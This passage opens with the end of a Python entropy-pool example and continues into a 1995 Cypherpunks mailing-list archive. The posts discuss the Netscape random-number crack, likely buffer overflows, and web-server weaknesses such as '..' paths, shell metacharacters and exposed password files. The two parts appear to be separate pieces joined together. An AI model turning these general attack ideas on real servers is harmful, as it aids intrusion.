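        out = b""
        counter = 0
        while len(out) < nbytes:
            out += hashlib.sha256(self._state + struct.pack(">I", counter)).digest()
            counter += 1
        self._state = hashlib.sha256(self._state + b"ratchet").digest()
        return out[:nbytes]


# Constructed sample input: 64 pointer samples with jittered tick counts, as a
# capture hook might record them while the user waves the mouse around.
CONSTRUCTED_MOUSE_EVENTS = [
    (100 + 3 * i, 200 - 2 * i, 1_000_000 + 1375 * i + (i * i) % 97)
    for i in range(64)
]


def session_key_from_events(events, key_bytes: int = 16) -> bytes:
    """Seed a pool from mouse events and derive a session key (128 bits by default).

    Raises RuntimeError if the events do not add up to enough credited entropy."""
    pool = EntropyPool(required_bits=8 * key_bytes)
    for x, y, ticks in events:
        pool.add_mouse_event(x, y, ticks)
    return pool.extract(key_bytes)


def clock_only_pool(seconds: int = 811_468_800, micros: int = 123_456,
                    pid: int = 4242) -> EntropyPool:
    """A pool fed nothing but a clock-and-pid seed (constructed values).

    It never becomes ready, which is exactly what the accounting is for."""
    pool = EntropyPool()
    pool.add_clock_and_pid(seconds, micros, pid)
    return pool


if __name__ == "__main__":
    key = session_key_from_events(CONSTRUCTED_MOUSE_EVENTS)
    print("event-seeded session key:", key.hex())
    weak = clock_only_pool()
    print("clock-only pool ready:", weak.ready(),
          "credited bits:", weak.credited_bits)
```

The credits here are placeholders; a real pool would estimate them from measured inter-event timing, and would keep mixing in fresh events for as long as the program runs.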
From perry at piermont.com Mon Sep 18 21:25:03 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 18 Sep 95 21:25:03 PDT
Subject: Brute Force and Smart Force
In-Reply-To: <199509190405.AAA03711@homeport.org>
Message-ID: <199509190424.AAA01393@frankenstein.piermont.com>

Adam Shostack writes:

> Perhaps we should refocus our efforts on attacking PGP, to see
> if there are holes there? (I'm not suggesting there are, but it
> would be nice to see some code written to extend Crack to phrases,
> do some more code review, etc.)

Probably a worthwhile enterprise. Unfortunately, Netscape and the like are low hanging fruit -- it's much simpler to find holes in things, er, of that, er, ah, quality -- and one probably rightfully gets more press for breaking them.

Perry

From perry at piermont.com Mon Sep 18 21:28:11 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 18 Sep 95 21:28:11 PDT
Subject: NYT on Netscape Crack
In-Reply-To:
Message-ID: <199509190427.AAA01402@frankenstein.piermont.com>

Black Unicorn writes:

> I've been having mail problems of late.
> Did you get my letter on your tax issue?

Yes, but I've been preoccupied by the latest internet political scandal over domain registration. Thank you greatly for the information; I'll probably ask you a question or two within a few days when my mail volume goes below 500 a day again.

Perry

From perry at piermont.com Mon Sep 18 21:28:51 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 18 Sep 95 21:28:51 PDT
Subject: NYT on Netscape Crack
In-Reply-To:
Message-ID: <199509190428.AAA01410@frankenstein.piermont.com>

Eek. Lovely accident. Never reply to "all" without checking the "to" list. Sigh.
Perry

From Sal at panix.com Mon Sep 18 21:30:20 1995
From: Sal at panix.com (Sal Denaro)
Date: Mon, 18 Sep 95 21:30:20 PDT
Subject: AOL monitoring
In-Reply-To:
Message-ID: <+3OXwAgbBgzR084yn@panix.com>

In article , you wrote:

> A further hint as to why this won't work: the client software doesn't
> keep track of which messages you've read in a discussion area, AOL's
> server's do. How do I know this? Because I use AOL on a Mac from home,

Ohhh-God, not again...

Can anyone remember the Prodigy rumor? How IBM was snooping around your hard disk, and it turned out to be nothing but a swapfile. Does "Good times" ring a bell? And don't get me started on MicroSoft Network rumors...

1) 90% of the FTP sites I use mention that they log xfers.

2) My .newsrc file can tell anyone that I read alt.hackers and alt.2600

3) My address book shows who I send mail often enough to warrant me putting in a nickname.

4) My sent-mail folder shows who I sent mail to in the past year.

5) My bookmark file shows that I read the NYC-Speedtraps page one or two times a week.

I am sure that AOL, Prodigy, CompuServe and Acme Internet all log what mail/news/web pages/ftp sites you have visited, in one way or another.

Does this bother me? A little. I use a local Internet provider with an OS I understand enough to know what is logged and what is not logged. My fear is not LEA, but crackers. As long as I make myself a hard target- the vultures will look elsewhere.

I repeat this like a mantra yet no one believes me- IF YOU WANT PRIVACY, DON'T USE THE PHONE. Once the headset is raised, big brother is online. If you do not like those rules, don't play the game.

--
Salvatore Denaro sal at panix.com    I waited for the joke/It never did arrive.
Yes, I use PGP                     Words I thought I'd choke/I hardly recognize.

From ponder at wane-leon-mail.scri.fsu.edu Mon Sep 18 21:32:59 1995
From: ponder at wane-leon-mail.scri.fsu.edu (P.J.
Ponder)
Date: Mon, 18 Sep 95 21:32:59 PDT
Subject: taxonomies of 'real money' and e-cash
In-Reply-To:
Message-ID:

On the 15th of September, Tim May wrote -

. . .

> "Digital money" currently has only a few ways of dealing with transfers of
> value in transactions. A lot of the problems come, in my view, from this
> relatively spartan set of "primitives."
>
> Where are the cryptographic equivalents of:
>
> - money orders
>
> - promissory notes
>
> - receipts
>
> - warrants
>
> - lockboxes
>
> - bearer bonds
>
> - options
>
> - time deposits
>
> - coupons
>
> - escrow
>
> - IOUs
>
> - zero coupon bonds
>
> - checks
>
> ...and so on. The terms in any good dictionary of financial terms (such as
> the "MIT Dictionary of Modern Economics," ed. by David Pearce, 1992). (Many
> of these things are built up out of more basic things, with mix-ins from
> other classes, or with modified methods.)
>
> A look at any book on money and finance shows a rich "microworld" of
> "things" and "procedures" (classes and methods attached to classes). The
> classes have subclasses, and the methods have various behaviors and
> "expectations" attached (more than just simple class behavior, more of an
> AI or agent flavor, in my view).
>
> . . . .
>
> --Tim May
>
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May | Crypto Anarchy: encryption, digital money,
> tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA | knowledge, reputations, information markets,
> Higher Power: 2^756839 | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
>

Maybe I'm missing the larger point, but isn't it accurate that in the digital world, one protocol or procedure may take the place of perhaps several of the 'real-world' procedures or protocols?
An effective mechanism of signing with non-repudiation that was recognized as binding on the signer would permit 'checks', 'promissory notes', 'IOUs', and 'warrants'. Some of the other species listed in your post aren't really money, anyway. They are things you can buy with money, like stock certificates or Maseratis. One could conceivably buy convertible debentures with e-cash, the same as one could buy them with 'real money', but it doesn't follow that there should be some one-to-one mapping of real money objects and classes onto electronic analogues.

Once again, I've probably missed the forest, but a couple of the trees distracted me.

--PJ Ponder

From shields at tembel.org Mon Sep 18 21:40:47 1995
From: shields at tembel.org (Michael Shields)
Date: Mon, 18 Sep 95 21:40:47 PDT
Subject: PGP for Linux 1.2.8
In-Reply-To:
Message-ID:

A non-text attachment was scrubbed...
Name: not available
Type: application/pgp
Size: 14 bytes
Desc: not available
URL:

From sameer at c2.org Mon Sep 18 22:02:45 1995
From: sameer at c2.org (sameer)
Date: Mon, 18 Sep 95 22:02:45 PDT
Subject: NYT on Netscape Crack
In-Reply-To: <199509190355.XAA01329@frankenstein.piermont.com>
Message-ID: <199509190457.VAA20451@infinity.c2.org>

> Not, of course, that they disclosed it before -- it was found by
> reverse engineering the distributed executable. Not, of course, that
> they have a choice in the matter of whether to disclose it -- they
> will be "disclosing" how its done as soon as they release the
> code. Not, of course, that security through obscurity does any good --
> it just magnifies the pain.

Once netscape is patched with a stronger PRNG if someone can crack -that- one too, then they will get a T-shirt as well. Perhaps I should offer the t-shirt for just revealing the algorithm used w/o actually cracking it, just to deal with that statement from "Netscape officials".

I emphasized in my conversation with the SFChronicle today that 'security by obscurity' doesn't work.
Hopefully that will be reflected in the article.

--
sameer Voice: 510-601-9777
Network Administrator FAX: 510-601-9734
Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376
http://www.c2.org (or login as "guest") sameer at c2.org

From jya at pipeline.com Mon Sep 18 22:03:04 1995
From: jya at pipeline.com (John Young)
Date: Mon, 18 Sep 95 22:03:04 PDT
Subject: FC's Opus
Message-ID: <199509190502.WAA01521@usr1.primenet.com>

Radio is blaring it out on KFAN and ABC RADIO now. What if all it is, is a Detweiler tentacle? hahahaha Love Always, Carol Anne.....coming to DC and NYC soon

The NY Times reports in tomorrow's paper that it and The Washington Post are publishing the Unabomber's 35,000-word manifesto as a separate pullout in The Washington Post tomorrow, as advised by AG Reno and FBI Director Freeh.

From stevenw at iglou.com Mon Sep 18 22:07:06 1995
From: stevenw at iglou.com (Steven Weller)
Date: Mon, 18 Sep 95 22:07:06 PDT
Subject: AOL monitoring
Message-ID:

>Ohhh-God, not again...
>
>Can anyone remember the Prodigy rumor? How IBM was snooping around your hard disk, and it turned out to be nothing but a swapfile. Does "Good times" ring a bell? And don't get me started on MicroSoft Network rumors...
>
>1) 90% of the FTP sites I use mention that they log xfers.
>
>2) My .newsrc file can tell anyone that I read alt.hackers and alt.2600
>
>3) My address book shows who I send mail often enough to warrant me putting in a nickname.
>
>4) My sent-mail folder shows who I sent mail to in the past year.
>
>5) My bookmark file shows that I read the NYC-Speedtraps page one or two times a week.

Zterm and Anarchie both default to logging transfers. AOL on the Mac has a button on the download manager that lets you view a list of items you have downloaded. It's everywhere.
------------------------------------------------------------------------- Steven Weller | "The Internet, of course, is more +1 415 390 9732 | than just a place to find pictures | of people having sex with dogs." stevenw at iglou.com | -- Time Magazine, 3 July 1995 From tcmay at got.net Mon Sep 18 22:11:56 1995 From: tcmay at got.net (Timothy C. May) Date: Mon, 18 Sep 95 22:11:56 PDT Subject: taxonomies of 'real money' and e-cash Message-ID: At 11:33 PM 9/18/95, P.J. Ponder wrote: ... > Maybe I'm missing the larger point, but isn't it accurate that in the >digital world, one protocol or procedure may take the place of perhaps >several of the 'real-world' procedures or protocols? An effective >mechanism of signing with non-repudiation that was recognized as binding >on the signer would permit 'checks', 'promissory notes', 'IOUs', and I wasn't saying they are all on the same footing, or are all separate and compartmentalizable things. Clearly some of them are just slightly different "flavors" of other things. I listed a bunch of them not as a taxonomy or ontology, but as an illustration that there are many kinds of financial dealings, many kinds of roles played. That the real world has so many flavors of financial things could of course be due to inertia and ignorance, partly. But there are also different functionalities, and costs. Fitting the different needs, the different roles of the players. I won't go on and on, as my last post on this I think hit the main points, but consider how many flavors we have just of "checks": the "ordinary" checks we write, counter checks, dual-endorser checks, traveller's checks, and so on. (If you are arguing that only "digital cash" is a real issue, and all other constructs are "small matters of programming," then we disagree profoundly.) >'warrants'. Some of the other species listed in your post aren't really >money, anyway. They are things you can buy with money, like stock >certificates or Maseratis. 
One could conceivably buy convertible
>debentures with e-cash, the same as one could buy them with 'real money',
>but it doesn't follow that there should be some one-to-one mapping of real
>money objects and classes onto electronic analogues. Once again, I've
>probably missed the forest, but a couple of the trees distracted me.

I don't get your point at all. I didn't claim they were all "money," whatever we may mean by _that_ loaded term, but that they are "things" with important features. And even your example of a thing like a "stock certificate" is not quite as simple as a thing like a "Maserati."

My belief is counter to yours: I believe many or even most of the financial things and instruments we deal with today will be mapped into "digital economy" versions, albeit with new wrinkles and perhaps new names. (I could cite many examples of protocols that cannot be automated for use by agents if the only carry-over is "digital cash." Voting of shares, endorsements on instruments, various kinds of guarantees, reputations, and so on.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From wb8foz at nrk.com Mon Sep 18 22:47:48 1995
From: wb8foz at nrk.com (David Lesher)
Date: Mon, 18 Sep 95 22:47:48 PDT
Subject: Caribbean Internet Services?
In-Reply-To:
Message-ID: <199509190524.BAA00324@nrk.com>

> ObCypherpunks Relevance: A couple of past or current list members have nascent Internet plans in some of these islands. (I think one of them is way south, just off Venezuela.)
> I suspect "Caribbean Data Havens" and "Internet Sites" are further off than they were a few months ago.
>
> --Tim May

I'm not as familiar w/ the VI's as other parts of the Carib, but I can say that Curacao is no St. Thomas. It's got real buildings, high ground and substantial infrastructure. You want primitive, try Guyana.

--
A host is a host from coast to coast.................wb8foz at nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433

From merriman at arn.net Mon Sep 18 22:50:26 1995
From: merriman at arn.net (David K. Merriman)
Date: Mon, 18 Sep 95 22:50:26 PDT
Subject: PGP for Linux 1.2.8
Message-ID: <199509190604.BAA10003@arnet.arn.net>

-----BEGIN PGP SIGNED MESSAGE-----

At 04:39 AM 9/19/95 +0000, you "wrote":
>Attachment Converted: D:\DOWNLOAD\MIME\RePGPfor.8
>

I, for one, don't need Mystery MIME Attachments cluttering up my drive. If it's worth saying, then *say* it.

Thank you.

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMF49HsVrTvyYOzAZAQE9aQP+JYa+eglyQCWWHxt5AexhapWyURziXX31
UN97I287MtJw62us1Usr3rpgSbm/7C1LaIZP4ucY0rEXXfvSRzbOPnaa0nPb18e/
Axf/5RzjsrgjvHiXsXm8e2/7z6fe+dByA6qSKLaE77yOkKNEoEPbUeJrjzX7PKSR
qLFotWpaYvs=
=VGzR
-----END PGP SIGNATURE-----

This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th of the PGP executable. See below for getting YOUR chunk!
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148

From shields at tembel.org Mon Sep 18 23:14:45 1995
From: shields at tembel.org (Michael Shields)
Date: Mon, 18 Sep 95 23:14:45 PDT
Subject: PGP for Linux 1.2.8
In-Reply-To: <199509190604.BAA10003@arnet.arn.net>
Message-ID:

> At 04:39 AM 9/19/95 +0000, you "wrote":
> >Attachment Converted: D:\DOWNLOAD\MIME\RePGPfor.8
> >
>
> I, for one, don't need Mystery MIME Attachments cluttering up my drive. If
> it's worth saying, then *say* it.

I really don't know why any mailers call a monopart MIME message an "attachment". In that message, I suggested that the list be gated to the new hierarchy crypto.cypherpunks for the convenience of netnews without the visibility of Usenet, and offered to run a gateway on news.tembel.org.

-- Shields.

From Rick.Sciorra at hudson.lm.com Mon Sep 18 23:17:18 1995
From: Rick.Sciorra at hudson.lm.com (Rick.Sciorra at hudson.lm.com)
Date: Mon, 18 Sep 95 23:17:18 PDT
Subject: Automatic E-Mail
Message-ID: <43khtu$bis@news1.warwick.net>

Does anyone know of an E-Mail package that will automatically connect to the Internet and retrieve mail at specific intervals?

From rjc at clark.net Tue Sep 19 00:03:38 1995
From: rjc at clark.net (Ray Cromwell)
Date: Tue, 19 Sep 95 00:03:38 PDT
Subject: NYT on Netscape Crack
In-Reply-To: <199509190355.XAA01329@frankenstein.piermont.com>
Message-ID: <199509190703.DAA03247@clark.net>

>
> I suspect that there are far more flaws in Netscape.
> String buffer overflows are another good guess here -- they are probably rampant through the code both for the browser and the commerce server they sell. I can't prove it myself, of course, given that I don't have the time to rip the thing apart, but the same folks never seemed to learn their lesson in release after release when they worked at NCSA, and the only thing that's probably keeping their dignity here is the lack of distributed source code.

I doubt this in the case of the browser. At least as far as the parsing is concerned. There may be a buffer overflow for example, when you input the url in the "open" window, but that has to be done manually by the user and isn't a threat, like a "rogue homepage" would be. The reason I doubt string buffer overflows in the case of the browser is that it seems to be written in some object oriented language, perhaps C++ (or maybe just oo-C like BSAFE). Once you have a general robust String class, you can prove it's non-overflowable, and therefore no composition of operations from the browser code will overflow it (unless of course, you break language safety by using casts and pointer manipulation). Secondly, Netscape has been very robust in my own testing against these common bugs. One of the things I've done lately is "tiger team" attacks against servers and browsers. (Of course, sendmail is a brilliant counter example.) (If you can find a call to gets() in Netscape, I will instantly retreat ;-) )

Netscape's security may be bad, but the rest of their browser, or at least their development process, is good engineering. They've built a very complex application, fairly quickly, that runs with very few bugs, across a wide variety of operating systems and GUIs, while maintaining a consistent user interface and feature set. Netscape 2.0 incorporated Java, LiveObjects, and more HTML3.0 in almost record time. (I wasn't expecting a Java capable Netscape until at least December).
I'd like to see Microsoft develop a piece of code that quickly that runs on umpteen different flavors of Unix, MacOS, and Win3.1/95/NT. Hell, they can't even write code that runs smoothly across all three flavors of their operating system.

-Ray

From sameer at c2.org Tue Sep 19 00:18:35 1995
From: sameer at c2.org (sameer)
Date: Tue, 19 Sep 95 00:18:35 PDT
Subject: NYT on Netscape Crack
In-Reply-To: <199509190703.DAA03247@clark.net>
Message-ID: <199509190713.AAA01128@infinity.c2.org>

>
> I doubt this in the case of the browser. At least as far as the
> parsing is concerned. There may be a buffer overflow for example,

Buffer overflow seems like a much greater concern when dealing with a server. Particularly one which is supposedly "secure", and accessing "secured" documents. Even with the server running as 'nobody' if someone can implement buffer overflow to get access to documents they shouldn't then that would count as a pretty significant hack. I suspect that the server is where the majority of the bugs lie. My Hack Netscape page emphasizes the server as a place to look for holes.

> when you input the url in the "open" window, but that has to be
> done manually by the user and isn't a threat, like a "rogue homepage"
> would be. The reason I doubt string buffer overflows in the case of
> the browser is that it seems to be written in some object oriented
> language, perhaps C++ (or maybe just oo-C like BSAFE). Once you
> have a general robust String class, you can prove it's non-overflowable,
> and therefore no composition of operations from the browser code will
> overflow it (unless of course, you break language safety by using
> casts and pointer manipulation) Secondly, Netscape has been very
> robust in my own testing against these common bugs. One of the things
> I've done lately is "tiger team" attacks against servers and browsers.
> (of course, sendmail is a brilliant counter example)
> (if you can find a call to gets() in Netscape, I will instantly
> retreat ;-) )
>
> Netscape's security may be bad, but the rest of their browser, or at least
> their development process, is good engineering. They've built a very
> complex application, fairly quickly, that runs with very few bugs,
> across a wide variety of operating systems and GUIs, while maintaining
> a consistent user interface and feature set. Netscape 2.0 incorporated
> Java, LiveObjects, and more HTML3.0 in almost record time. (I wasn't
> expecting a Java capable Netscape until at least December). I'd like to
> see Microsoft develop a piece of code that quickly that runs on
> umpteen different flavors of Unix, MacOS, and Win3.1/95/NT. Hell, they
> can't even write code that runs smoothly across all three
> flavors of their operating system.
>
> -Ray

--
sameer Voice: 510-601-9777
Community ConneXion FAX: 510-601-9734
An Internet Privacy Provider Dialin: 510-658-6376
http://www.c2.org (or login as "guest") sameer at c2.org

From rjc at clark.net Tue Sep 19 00:34:36 1995
From: rjc at clark.net (Ray Cromwell)
Date: Tue, 19 Sep 95 00:34:36 PDT
Subject: NYT on Netscape Crack
In-Reply-To: <199509190713.AAA01128@infinity.c2.org>
Message-ID: <199509190734.DAA09824@clark.net>

> > I doubt this in the case of the browser. At least as far as the
> > parsing is concerned. There may be a buffer overflow for example,
>
> Buffer overflow seems like a much greater concern when dealing
> with a server. Particularly one which is supposedly "secure", and
> accessing "secured" documents. Even with the server running as
> 'nobody' if someone can implement buffer overflow to get access to
> documents they shouldn't then that would count as a pretty significant
> hack.

Right. Some other common ones are ".." and shell meta characters in paths. Also, accessing files that you don't have permissions to.
Even if the server is perfect, the setup could be bad. For instance, if you use CERN's Authentication scheme for protecting URL hierarchies, do not put the passwd/group file within the hierarchy. I've noticed this before on some servers, like http://www.isp.com/company1/passwd contains the passwd file for the http://www.isp.com/company1/ URL directory. Although it is convenient to store the passwd file within the hierarchy it is protecting, care must be taken to make it unreadable by normal HTTP requests. It's better to put it in a configuration directory somewhere that no server has access to. (I've seen this mistake plenty of times.)

A barebones web server is a pretty simple piece of software compared to a browser (or sendmail), so it should be possible to make them much more secure.

-Ray

From sameer at c2.org Tue Sep 19 00:53:18 1995
From: sameer at c2.org (sameer)
Date: Tue, 19 Sep 95 00:53:18 PDT
Subject: NYT on Netscape Crack
In-Reply-To: <199509190734.DAA09824@clark.net>
Message-ID: <199509190748.AAA03614@infinity.c2.org>

> http://www.isp.com/company1/passwd contains the passwd file for the
> http://www.isp.com/company1/ URL directory. Although it is convenient
> to store the passwd file within the hierarchy it is protecting, care
> must be taken to make it unreadable by normal HTTP requests. It's better
> to put it in a configuration directory somewhere that no server
> has access to. (I've seen this mistake plenty of times)

The server process itself still needs access to that file though in order to verify passwords, so it can't be totally protected-- a bug in the server might reveal the password file. A relatively minor point..

> A barebones web server is a pretty simple piece of software compared
> to a browser (or sendmail), so it should be possible to make them
> much more secure.

Right. The Netscape Commerce server, on the other hand, is by no means a barebones webserver.
It has a full-featured API which allows dynamic loading of custom-written modules to handle every aspect of web serving. Its configuration files, while not as complex as sendmail config files, are rather complex. The server comes with a "GUI administration tool", which allows you to configure the server using netscape over HTTP to a special server, -running as root-, which can modify configuration files, restart the server, etc. (I am not sure if the administration server -must- run as root, but that is how it has been configured in the installations I have seen.)

Even extremely good security programmers could probably not write such a complex program without bugs, particularly on the timescale for which you have commended Netscape. (Extremely good ethical security programmers may not even be -willing- to write such a complex program and declare it secure.)

There is actually an interesting parallel to sendmail in webservers.. webservers have a very vital 'rewriting' phase, where they turn the url (/~sameer for example) into a filename (/u1/sameer/public_html/index.phtml). This phase is where it checks ownership, checks symlinks, etc. I figure that section may be rife with holes, given the incredibly powerful rewriting that the highly flexible servers can do these days.

--
sameer Voice: 510-601-9777
Community ConneXion FAX: 510-601-9734
An Internet Privacy Provider Dialin: 510-658-6376
http://www.c2.org (or login as "guest") sameer at c2.org

From jsw at neon.netscape.com Tue Sep 19 01:14:28 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Tue, 19 Sep 95 01:14:28 PDT
Subject: NYT on Netscape Crack
In-Reply-To: <199509190300.XAA05027@pipe4.nyc.pipeline.com>
Message-ID: <43lu3k$7q6@tera.mcom.com>

In article <199509190355.XAA01329 at frankenstein.piermont.com>, perry at piermont.com (Perry E.
Metzger) writes:
> > Markoff's article in the Times says:
> > Netscape officials said today that they would strengthen
> > the system, by making it significantly harder to determine
> > the random number at the heart of their coding system. They
> > said they would no longer disclose what data would be used
> > to generate the random numbers.
>
> Not, of course, that they disclosed it before -- it was found by
> reverse engineering the distributed executable. Not, of course, that
> they have a choice in the matter of whether to disclose it -- they
> will be "disclosing" how it's done as soon as they release the
> code. Not, of course, that security through obscurity does any good --
> it just magnifies the pain.

Regardless of what Markoff implies, we do not intend to depend on security through obscurity.

> I suspect that there are far more flaws in Netscape. String buffer
> overflows are another good guess here -- they are probably rampant
> through the code both for the browser and the commerce server they
> sell. I can't prove it myself, of course, given that I don't have the
> time to rip the thing apart, but the same folks never seemed to learn
> their lesson in release after release when they worked at NCSA, and
> the only thing that's probably keeping their dignity here is the lack
> of distributed source code.

Sigh. For your information the security code for 1.x versions of netscape was not even written by someone from NCSA. The current security team (which does not include the person who did the 1.x version) also does not include anyone from NCSA. While I can't guarantee that such buffer overflow errors don't exist in our current products since I have not personally examined every line of code, your generalization from experience with mosaic is bogus. In the places in the code that I have seen where it looked like such errors could have crept in, I have found that the correct checks for buffer overflow have been in place.
--Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From cwe at Csli.Stanford.EDU Tue Sep 19 01:19:55 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Tue, 19 Sep 95 01:19:55 PDT Subject: Brute Force and Smart Force In-Reply-To: <199509190424.AAA01393@frankenstein.piermont.com> Message-ID: <199509190819.BAA15784@Csli.Stanford.EDU> | Adam Shostack writes: | > Perhaps we should refocus our efforts on attacking PGP, to see | > if there are holes there? (I'm not suggesting there are, but it | > would be nice to see some code written to extend Crack to phrases, | > do some more code review, etc.) | | Probably a worthwhile enterprise. Unfortunately, Netscape and the like | are low hanging fruit -- its much simpler to find holes in things, er, | of that, er, ah, quality -- and one probably rightfully gets more | press for breaking them. What I don't understand is why the law-enforcement is so concerned about bruting things. It is probably quite easy to tap the keyboard, smart force, exchange the binary with the real thing etc for them? (Unless they want to read it all from a nice tipped-back armchair in a certain location? :-)) What I'm saying is that this kind of attack should work quite easily in the one-by-one cases, but not on a large scale, malicious data, trojan horses, outright bugging. So why all this Clipper (son-of-X) fuss? Ok, not for all data, especially not for the "untouched, rarely used" ones. But is this any different from hiding your diary in a very safe place anyway? /Christian From roy at cybrspc.mn.org Tue Sep 19 02:21:51 1995 From: roy at cybrspc.mn.org (Roy M. 
Silvernail) Date: Tue, 19 Sep 95 02:21:51 PDT
Subject: VeriSign Introduces the First Digital ID Issuing Service
In-Reply-To: <9509181742.aa29912@ncrhub1.ATTGIS.COM>
Message-ID: <950919.012810.3g2.rnr.w165w@cybrspc.mn.org>

-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, Chris.Claborne at SanDiegoCA.ATTGIS.COM quotes a VeriSign press release:

> Class One Digital IDs: These IDs insure the uniqueness of a name or
> e-mail address. Class One Digital IDs are primarily used for casual
> World Wide Web browsing and secure e-mail. VeriSign offers
> non-commercial Class One Digital IDs at no cost or VeriSign supported
> commercial versions for $6.

> Netscape Navigator 2.0 users will be able to download Class One Digital
> IDs from VeriSign's new Online Digital ID Issuing Service on the World
> Wide Web beginning in late October.

I can foresee some possible DOS attacks against the Class One certificate. (P'raps I should get mine forthwith?) And what protection is VeriSign offering against the misuse of our certificates (given that VeriSign must undoubtedly hold copies of all the issued certs)?

- --
Roy M. Silvernail -- roy at cybrspc.mn.org
perl -e '$x = 1/20; print "Just my \$$x! (adjusted for inflation)\n"'
"What do you mean, you've never been to Alpha Centauri?" -- Prostetnic Vogon Jeltz

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMF5kXBvikii9febJAQFu6QQAmA46r+MuUOprM/ETHPnzKVYWuc8vT22i
xqzgV5ScNLPe2fjSBlWtazT+e1xbj6MQKzHfqJUZztvRfpD4U3h7xptuf5WjRhlt
liHgrLvg9Nkq4azfQkS71ifW2cM4uZZpF0BrQsNxEsN5WiiYkBGFQCN8eRZ17s3i
GnU/FjZbiGc=
=o0wf
-----END PGP SIGNATURE-----

From stewarts at ix.netcom.com Tue Sep 19 02:30:09 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 19 Sep 95 02:30:09 PDT
Subject: Automatic E-Mail
Message-ID: <199509190929.CAA23985@ix.ix.netcom.com>

[This isn't quite on topic, though you could stretch it to deal with remailers. Can the winsock remailer do this?]
At 10:50 PM 9/18/95 GMT, Rick.Sciorra at hudson.lm.com wrote:
>Does anyone know of an E-Mail package that will automatically connect
>to the Internet and retrieve mail at specific intervals?

Sigh. Folks have gotten too used to PC-market email systems, which are generally braindamaged by having been around operating systems where you can't just run a listener program that waits for somebody to call you when they want to send you mail, which of course fits in very well with letting ISPs avoid having to make outgoing phone calls instead of just receiving, plus the market reluctance of many of them to forward mail for you to competing mail services and the client/server-orientation that makes peer-to-peer services harder to implement. Unix systems did this job just fine on PDP11/70s, which could support a dozen or two users on a machine with about the horsepower of a PC/AT. And Henry Spencer could do that on a /44 :-)

Just about anything that does UUCP can be set to do that, if you've got an ISP who doesn't charge you lots extra for using UUCP. Most high-end terminal emulation packages have scripting languages that let you call up and do stuff, which you should be able to call from timer programs; you can probably even find a free Kermit version that will do it. I use Eudora Light with Trumpet to call Netcom's newbie-friendly Netcruiser service; when I hit the menu item for send or retrieve mail, it pops through all the layers and dials, and hangs up when it's done. If Commercial Eudora can't already do that automagically, it should - ask Qualcomm to add it to the next version...

Alternatively, Winsock programming isn't really all that hard, and POP3 is a pretty simple protocol, so you could roll your own.
#--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Tue Sep 19 02:30:11 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 19 Sep 95 02:30:11 PDT Subject: MIME attachments and ranting. Message-ID: <199509190929.CAA23989@ix.ix.netcom.com> >> >Attachment Converted: D:\DOWNLOAD\MIME\RePGPfor.8 >> I, for one, don't need Mystery MIME Attachments cluttering up my drive. If >> it's worth saying, then *say* it. >I really don't know why any mailers call a monopart MIME message an >"attachment". Mail readers come in three basic flavors of unMIMEificationness: 1) Ignorance+bliss - the mailer doesn't know or care about MIME headers, and you can ignore them when you read them, and may be able to configure the reader not to bother you with most of them (e.g. BSD Mail.) 3) Intelligence - the mailer does something genuinely useful to help you read the attachment, like letting you pop up some appropriate reading tool. 2) Naive friendliness - the Sirius Cybernetics approach. "Your mail file has been tastefully shredded into little pieces and sprinkled around your disk drive. Thank you for making a humble mail system so _very_ happy." Free Eudora versions offer you several choices of tastefulness and shredditude, partly intended to provide artistic functionality and partly to encourage you to buy the commercial version which gives you a more flexible user interface for extensions like MIME. So buy it, or cope with it, or tell Eudora to use your RAMdisk for its attachments where they'll soon go away and not bother you. There's also another approach, typified by a vendor whose name will be omitted but they'd know who they were if they had a clue.... 
